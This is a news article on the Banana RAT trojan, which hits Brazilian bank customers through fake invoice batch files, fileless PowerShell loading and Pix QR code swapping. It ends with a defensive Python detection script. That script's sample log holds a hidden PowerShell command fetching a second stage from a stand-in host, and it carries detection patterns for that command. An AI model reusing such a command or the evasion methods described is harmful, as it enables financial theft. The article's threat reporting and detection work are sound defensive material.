Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks
Banana RAT malware targets 16 Brazilian banks via fake invoices, stealing data with QR code fraud.
Summary
Banana RAT, a remote access trojan linked to threat group SHADOW-WATER-063, is actively targeting customers at 16 Brazilian banks including Itaú, Bradesco, and Santander. The malware is distributed through fake invoice files and security update screens via WhatsApp and phishing, using fileless execution and a custom FastAPI crypter to evade detection. It enables real-time financial fraud by intercepting banking sessions, replacing Pix QR codes, and freezing user input while attackers steal funds.
Full text
by Deeba Ahmed, May 20, 2026

A new threat called Banana RAT malware is targeting banking customers in Brazil, using fake documents and tools to compromise devices and steal funds. Cybersecurity experts from TrendAI (formerly Trend Micro) found the operation and shared its details with Hackread.com.

Inside the Attack Pipeline

The scam was still active when TrendAI experts began investigating. They collected data directly from the hackers’ live servers between 17 and 22 April 2026 to fully understand how the scam works. They found that the attackers speak Brazilian Portuguese, operate under the temporary name SHADOW-WATER-063, and are targeting individuals in Brazil’s business sector to deliver the Banana RAT malware. The hackers’ own code stamps revealed their internal project codename as Projeto Banana.

Further probing revealed that the scammers trick victims, via WhatsApp or phishing links, into downloading a fake electronic invoice file named Consultar_NF-e.bat from the domain convitemundial2026.com. When the victim opens it, the batch file runs a hidden PowerShell command that fetches a second file called msedge.txt. At this point the chain becomes fileless: the main code runs entirely in the computer’s memory and is never written to disk. To avoid detection, the malware copies its files into a fake Microsoft folder path (C:\ProgramData\Microsoft\Diagnosis\ETW).

On the hacker-controlled servers, the group uses FastAPI crypter, a custom obfuscation tool, to manage the attack.
They do not need to send the same file to everyone: the server setup automatically scrambles the code to generate 100 to 200 unique malware versions at once, and because every download is different, standard antivirus tools cannot recognise or block the file.

Stealing Money in Real Time

The operation is straightforward financial fraud, targeting 16 specific Brazilian banks and crypto exchanges. What makes Banana RAT dangerous is that it gives the attackers total control by functioning as a live surveillance and theft tool. With features like screen streaming, the hackers can view the victim’s desktop, log keystrokes to steal passwords, and use BlockInput to freeze the victim’s mouse and keyboard.

“What makes this case notable is not just the sophistication of the tooling – it is the intent behind it. This is an operation purpose-built to enable real-time financial fraud: intercepting banking sessions, manipulating payment flows, and deceiving victims when they are most vulnerable,” researchers noted in the blog post.

When a victim opens their online bank, the malware uses a Display Overlay Module to pop up a fake full-screen message saying “Mandatory Security Update – DO NOT TURN OFF YOUR COMPUTER”. While the user waits, the attacker makes fraudulent transfers in the background. The malware also uses the ZXing barcode library to swap Pix QR codes (Pix is Brazil’s instant-payment system). If a user tries to scan a QR code to pay a bill, the malware changes the payment data so the money goes straight to the scammers.

Banana RAT killchain (Source: TrendAI)

The malware targets some of Brazil’s largest retail and corporate financial institutions, including:

- Itaú
- Caixa
- Bradesco
- Santander
- Banco do Brasil (BB)

It also targets regional banks like Banrisul and Daycoval, and cooperative networks like Sicoob and Sicredi. TrendAI is now working with the Federação Brasileira de Bancos (FEBRABAN) to share intelligence and stop the threat.
Until the infrastructure is taken down, the researchers advise organisations to block network access to the primary command domain, cwindowsk-cdncom, to keep systems safe.

Sharing his insights with us on this discovery, TrendAI’s VP of AI Security and Threat Research, Tom Kellermann, stated: “The Brazilian cybercrime cartels are very sophisticated and organized, and they have been a bane to the financial sector since 2000. The RATs and rootkits they develop are on par with those we have seen from Russia. Insufficient attention is being paid to cybercrime in LATAM, and the financial sector has good reason to be concerned as something wicked comes this way.”
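As an added example (not TrendAI’s tooling and not code from the article), the script below triages Sysmon-style JSON events for the three observable stages described above: a .bat launching a hidden PowerShell fetch of msedge.txt, files staged under C:\ProgramData\Microsoft\Diagnosis\ETW, and lookups of the delivery domain convitemundial2026.com. The event schema, the hidden-window flag check and the sample log lines are assumptions constructed for this example; only the domain, file names and folder path come from the article.

```python
import json
import re

# Indicators come from the article; the heuristics around them are this example's own assumptions.
STAGING_DIR = r"c:\programdata\microsoft\diagnosis\etw"      # fake Microsoft path the RAT copies into
DELIVERY_DOMAINS = {"convitemundial2026.com"}                 # hosts the fake invoice Consultar_NF-e.bat
HIDDEN_FLAG = re.compile(r"-w(indowstyle)?\s+hidden", re.I)   # assumed way the .bat hides PowerShell

def bat_spawns_hidden_powershell(e):
    """cmd.exe running a .bat starts a hidden PowerShell that pulls msedge.txt."""
    return (e.get("type") == "process_create"
            and e.get("image", "").lower().endswith("powershell.exe")
            and e.get("parent_image", "").lower().endswith("cmd.exe")
            and ".bat" in e.get("parent_cmdline", "").lower()
            and HIDDEN_FLAG.search(e.get("cmdline", "")) is not None
            and "msedge.txt" in e.get("cmdline", "").lower())

def write_to_fake_etw_dir(e):
    """Any file dropped under the staging directory the malware copies itself into."""
    return (e.get("type") == "file_create"
            and e.get("target", "").lower().startswith(STAGING_DIR))

def contacts_delivery_domain(e):
    """DNS lookup of the distribution domain (also the domain defenders should block)."""
    return (e.get("type") == "dns_query"
            and e.get("query", "").lower().rstrip(".") in DELIVERY_DOMAINS)

RULES = (bat_spawns_hidden_powershell, write_to_fake_etw_dir, contacts_delivery_domain)

def scan(log_lines):
    """Return [(rule_name, event_id)] for every JSON event line that matches a rule."""
    hits = []
    for line in log_lines:
        if not line.strip():
            continue
        event = json.loads(line)
        hits.extend((rule.__name__, event["id"]) for rule in RULES if rule(event))
    return hits

# Constructed Sysmon-style events (JSON lines); user paths and the second-stage host are made up.
SAMPLE_LOG = r"""{"id": 1, "type": "process_create", "image": "C:\\Windows\\System32\\cmd.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "cmd.exe /c C:\\Users\\ana\\Downloads\\Consultar_NF-e.bat", "parent_cmdline": "explorer.exe"}
{"id": 2, "type": "process_create", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "powershell.exe -w hidden -c Invoke-WebRequest https://second-stage.example/msedge.txt", "parent_cmdline": "cmd.exe /c C:\\Users\\ana\\Downloads\\Consultar_NF-e.bat"}
{"id": 3, "type": "process_create", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "powershell.exe -File build.ps1", "parent_cmdline": "cmd.exe /c build.bat"}
{"id": 4, "type": "file_create", "target": "C:\\ProgramData\\Microsoft\\Diagnosis\\ETW\\msedge.txt"}
{"id": 5, "type": "file_create", "target": "C:\\ProgramData\\Microsoft\\Windows\\Caches\\cache.db"}
{"id": 6, "type": "dns_query", "query": "convitemundial2026.com"}
{"id": 7, "type": "dns_query", "query": "www.microsoft.com"}
"""
```

Running `scan(SAMPLE_LOG.splitlines())` flags events 2, 4 and 6 and leaves the benign cmd, build-script and Windows cache events alone.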
Indicators of Compromise
- domain — convitemundial2026.com
- malware — Banana RAT
- malware — FastAPI crypter